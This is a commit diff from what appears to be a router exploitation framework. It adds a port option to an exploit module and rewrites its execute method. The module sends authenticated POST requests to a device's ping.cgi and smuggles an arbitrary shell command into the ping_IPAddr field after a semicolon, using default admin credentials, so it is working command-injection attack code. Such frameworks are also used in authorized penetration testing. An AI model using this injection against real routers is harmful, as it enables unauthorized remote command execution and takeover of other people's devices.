Commit 91b8186b by lucyoa

Adding port option, fixing execute method

parent 9ecf256f
......@@ -35,6 +35,8 @@ class Exploit(exploits.Exploit):
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
port = exploits.Option(80, 'Target Port') # target port
login = exploits.Option('admin', 'Username')
password = exploits.Option('password', 'Password')
......@@ -50,11 +52,15 @@ class Exploit(exploits.Exploit):
print_error("Target is not vulnerable")
def execute(self, command):
url = "{}/ping.cgi".format(self.target)
url = "{}:{}/ping.cgi".format(self.target, self.port)
data = {'IPAddr1': 12, 'IPAddr2': 12, 'IPAddr3': 12, 'IPAddr4': 12, 'ping': "Ping", 'ping_IPAddr': "12.12.12.12; " + command}
referer = "{}/DIAG_diag.htm".format(self.target)
headers = {'referer': referer}
r = http_request(method="POST", url=url, data=data, auth=(self.login, self.password), headers=headers)
if r is None:
return ""
result = self.parse_output(r.text)
return result.encode('utf-8')
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment